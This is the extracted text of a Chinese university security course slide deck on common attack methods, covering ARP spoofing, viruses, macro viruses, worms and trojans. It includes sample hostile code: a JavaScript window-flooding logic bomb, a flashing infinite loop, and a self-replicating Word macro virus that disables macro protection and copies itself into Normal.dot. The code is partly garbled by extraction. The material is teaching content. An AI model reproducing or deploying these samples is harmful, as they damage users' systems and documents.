《《常见攻击方法》ppt课件》由会员分享,可在线阅读,更多相关《《常见攻击方法》ppt课件(65页珍藏版)》请在金锄头文库上搜索。
1、第4章 常见攻击方法,4.1 攻击方法概述 4.2 病毒与恶意软件 4.3 扫描攻击 4.4 拒绝服务攻击 思考题 实验4 用Winpcap API实现ARP攻击,4.1 攻击方法概述,“知己知彼,百战不殆”。研究信息安全不研究信息攻击方法就是纸上谈兵。 信息攻击的方法有很多。一般教科书上把信息攻击分为主动攻击和被动攻击两大类,我们这里把信息攻击分为信息的侦察与窃取、信息欺骗和信息封锁与破坏三个大类。攻击者试图通过使用其中一种或多种方法达到攻击目的。,电话窃听、电子信息侦察、特洛伊木马、扫描、网络嗅探等是信息侦察与窃取的常用方法。其中,网络嗅探器是一种能自动捕获网络中传输报文的设备,一般设置在
2、网络接口位置。有些嗅探器能够分析几百种协议,捕获网上传输的口令、机密文件与专用信息,还可以获取高级别的访问权限。,计算机网络窃密具有隐蔽性好、渠道众多、难以防范、效果显著、威胁性大等特点,正越来越引起人们的关注。计算机窃取技术主要有截取计算机电磁和声泄露、通过计算机和存储介质窃密、通过刺探窃取口令或绕过访问控制机制非法进入计算机系统窃密、利用技术垄断在系统或软件中安装木马窃密、利用网络协议和操作系统漏洞窃密等。 通信内容欺骗、IP地址欺骗、新闻媒体欺骗、雷达欺骗、社会工程学攻击等是常见的信息欺骗方法。其中社会学攻击是利用人们的心理特征骗取信任并进而实施攻击的一种方法。这种方法目前正呈上升和泛滥
3、趋势。,据军事心理学家的分析和测试证明,当一个人同时对一个事物接到两种内容完全相反的正、误信息时,其得出正确结论的概率只有50%,最高不超过65%;当再次接到错误信息时,其判断出错的概率又增加15%;当其始终接受某一错误信息导向时,即使训练有素的人,也难以得出正确的结论。 信息封锁与破坏是指通过一定的手段使敌方无法获取和利用信息,如拒绝服务攻击、计算机病毒、电子干扰、电磁脉冲、高能微波、高能粒子束和激光等。,例4-1 ARP欺骗攻击。 IP数据包放入帧中传输时,必须要填写帧中的目的物理地址。通常用户只指定目的IP地址,计算机自动完成IP地址到物理地址的转换。地址解析协议(Address Res
4、olution Protocol,ARP)利用目的IP地址,与子网内其他计算机交换信息,完成IP地址到物理地址的转换。,源主机在发出ARP请求并接收到ARP应答后,将目的主机的IP地址与物理地址映射关系存入自己的高速缓冲区。目的主机接收到ARP请求后将源主机的IP地址与物理地址映射关系存入自己的高速缓冲区。读者可以通过“arp-a”命令在DOS 状态下查看本机最近获得的arp表项。ARP请求是广播发送的,网络中的所有主机接收到ARP请求后都可以将源主机的IP 地址与物理地址映射关系存入自己的高速缓冲区。 在高速缓冲区中,新表项加入时定时器开始计时。表项添加后2分钟内没有被再次使用即被删除。表项
5、被再次使用时会增加2 分钟的生命周期,但最长不超过10 分钟。 ARP协议的原理如图4-1、4-2所示。,图4-1 ARP原理(一),图4-2 ARP原理(二),ARP欺骗攻击分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。 第一种ARP欺骗的原理是,设法通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,导致路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。第二种ARP欺骗的原理是伪造网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。图4-3为结合上述两种欺骗原理的所谓ARP
6、双向欺骗示意图。,图4-3 ARP双向欺骗示意图,4.2 病毒与恶意软件,4.2.1 病毒 根据中华人民共和国计算机信息系统安全保护条例,病毒的明确定义是“指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码”。,病毒既可以感染桌面计算机也可以感染网络服务器,往往还具有一定的潜伏性、特定的触发性和很大的破坏性。一些病毒被设计为通过损坏程序、删除文件或重新格式化硬盘来损坏计算机。有些病毒不损坏计算机,而只是复制自身,并通过显式形式表明它们的存在。根据其性质、功能和所造成的危害,计算机病毒大致可分为定时炸弹型、暗杀型、强制隔离型、超载
7、型、间谍型和矫令型。,病毒一般分成主控模块、传染模块、破坏模块和触发模块4个部分,结构框架可表示如下: 病毒程序 感染模块: 循环:随机搜索一个文件; 如果感染条件满足 则将病毒体写入该文件; 否则跳到循环处运行; 破坏模块: 执行病毒的破坏代码 触发模块:,如果触发条件满足 返回真; 否则返回假; 主控模块: 执行传染模块; 执行触发模块 如果返回为真,执行破坏模块; 执行原程序; ,病毒的传染模块主要完成病毒的自我复制。传染的一般过程是:当病毒程序或染毒的程序运行时,病毒截取控制权,寻求感染突破口,当传染条件满足,即将病毒代码自制到宿主程序。病毒的传染条件根据不同的传染方式有不同的类型。例
8、如,常驻内存病毒一般修改系统中断并插入病毒中断程序。如果其他程序访问被病毒挂接中断,则即会被传染。 脚本病毒是计算机病毒的一种形式,主要采用脚本语言编写,它可以对系统进行操作,包括创建、修改、删除,甚至格式化硬盘,具有传播速度快,危害性大等特点。脚本病毒的书写形式灵活,容易产生变种,这就使得传统的特征提取方式对变种脚本病毒检测率很低,对未知的脚本病毒甚至无法识别。,微软提供了一种基于32位Windows平台的、与语言无关的脚本解释机制WSH。它使得脚本能直接在Windows桌面或命令提示符下运行。浏览器也依赖于WSH提供的VBScript和JAVAScript脚本引擎,解释网页中嵌入的脚本代码
9、。,例4-2 下面的代码是一个逻辑炸弹,请读者阅读该代码并以hellow1.htm存盘, 然后双击该文件,察看并分析运行结果。 no ; function openwindow() for(i=0; i1000;i+) window.open(http:/); ,例4-3 下面一段代码利用死循环原理,交叉显示红色和黑色,造成刺眼效果。请读者阅读下列代码并以hellow.htm存盘,双击该文件,察看并分析运行结果 test var color=new Array; color1=“black“;,color2=“red“; for (x=2;x ,宏(macro)是微软为其office软件设计的
10、一种特殊功能,其目的是为了在使用该软件时避免重复相同的工作。而宏病毒是一种特殊的宏,它通过使用应用程序的宏语言(如VRA)生成与文档相联系的病毒。编制者通过修改Word的命令、使用Document对象的事件、利用Word启动时自动加载normal.doc模板和它所包含宏的特点修改normal.doc中的自动宏等方法来进行激发。,例4-4 Word宏病毒示例。 所有Word文档和模板都有Document对象。Document对象支持Close、New和Open三种事件。如果在代码模块中存在响应这些事件的过程,则当执行关闭文档、建立新文档或打开文档的操作时,相应文档事件过程就会被执行。下面是以Do
11、cument对象的事件作为激发机制的宏病毒样本,请读者分析其大体结构。,Private Sub document_open( ) 定义Document对象的Open事件 Dim定义事件中所用的各种变量(略) On Error Resume Next 若有错误,继续执行以下语句 Options VirusProteetion=False 将宏安全等级设置为低,本语句在Word 2000中无效 If Month(Now)=5 And day(Now)=12 Then 以5月12日为病毒发作触发条件(宏病毒表现代码段略),Else Set objActiveDocument=ActiveDocume
12、nt .VBProject. VBComponentsItem(thisdocument“)CodeModule Set objNormal=NormalTemplate.VBProject.VBComponents Item(Thisdocument“)CodeModule 查找活动文档和Normal公共模板的Thisdocument类模块中是否有字符串“abed”。此处“abed”是病毒感染标志,说明文档或模板是否已经感染了该病毒,blnobjActive=objActiveDocumentFind(“abed”,1,1,1000010000) blnobjNormal=objNormal
13、Find(abed”1,1,10000,10000) 若活动文档已有该宏病毒,而Normal公共模板中没有,则将Normal公共模板的Thisdocument类模块中的代码全部删除后将活动文档中的宏病毒体复制到Normal公共模板中,并保存Normal公共模板 If blnobjActive=True And blnobjNormal=False Then,ObjNorma1deletelines 1,objNormalcountoflines bdl=objActiveDocumentlines(1,objActiveDocumencountoflines) objNormaladdfrom
14、string bdt NormalTemplateSave End If 若Normal公共模板已有该宏病毒,而活动文档中役有,则将活动文档的Thlsdocument类模块中的代码全部删除后,将Normal公共模板中的宏病毒体复制到活动文档中,并保存活动文档,If blnobjNormal=True And blnobjActive=False Then objActiveDoceumeotdeletelines 1,objActiveDocumentcountoflines bdI=objNormal.lines(1,objNormalCountoflines) objActiveDocum
15、ent. addfromstring bdt ActiveDocument. Save End If End If End Sub,宏病毒的破坏作用可造成文档不能正常打印、将文件改名、改变文件存储路径、重复复制文件、封闭有关菜单等。宏病毒还能够调用系统命令,进而破坏整个信息处理系统。由于宏病毒依附于Word文档,隐蔽性较强,这给其通过电子邮件附件传播带来了方便。更新的电子邮件病毒则只要打开邮件便能感染所有邮件地址。,蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,同时具有自己的一些特征,如蠕虫不使用驻留文件即可在系统之间进行自我复制,传染目标是互联网内的所有计算机,等等。典型的蠕虫病毒
16、有尼姆达、震荡波等。 特洛伊木马是一种隐蔽植入对方计算机系统中的病毒。它可以根据程序设计者的设定,在被植入用户未知的情况下,将被攻击者的机器中的信息源源不断地窃取出来。 “传奇木马”和“QQ木马”能够窃取用户的游戏账号和密码。“灰鸽子”和“德芙”具有后门功能。当前我国网络流行病毒的本土化趋势更加明显,很多病毒主要是针对国内一些应用程序专门制作的。,目前,病毒的发展呈现如下六大特征: (1) 经济利益驱使计算机病毒技术不断突破。Rootkit隐藏技术以及对抗杀毒软件技术被广泛应用。 (2) 微软“Oday”漏洞频繁爆出。 (3) 网银病毒迅猛增长。如今更多的病毒、蠕虫和木马程序是以计算机缓存里的用户个人信息为目标,试图窃取用户信用卡号码、银行密码等,这被称为“认证盗窃”。 (4) 病毒传播呈现新特征,锁定目标定向传播。 (5) 病毒变种快、更新快、存活能力强。 (6) 智能手机成病毒的下一个攻击目标。,为了加强反病毒工
